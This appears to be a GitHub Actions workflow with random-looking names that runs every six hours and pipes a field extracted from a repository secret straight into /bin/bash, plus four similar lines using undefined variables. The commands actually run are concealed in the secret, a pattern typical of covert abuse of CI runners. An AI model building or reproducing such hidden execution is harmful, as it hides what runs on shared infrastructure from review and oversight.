name: shenwansi4178

on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shenwansi4178
        env:
          slncf19: ${{ secrets.slncf19 }}
        run: |
          echo $slncf19 | jq -r .z65 | /bin/bash
          echo $thd6476 | jq -r .kgq4 | /bin/bash
          echo $ynupr40 | jq -r .t3 | /bin/bash
          echo $nzash6703 | jq -r .n9 | /bin/bash
          echo $fa107 | jq -r .ieby12 | /bin/bash

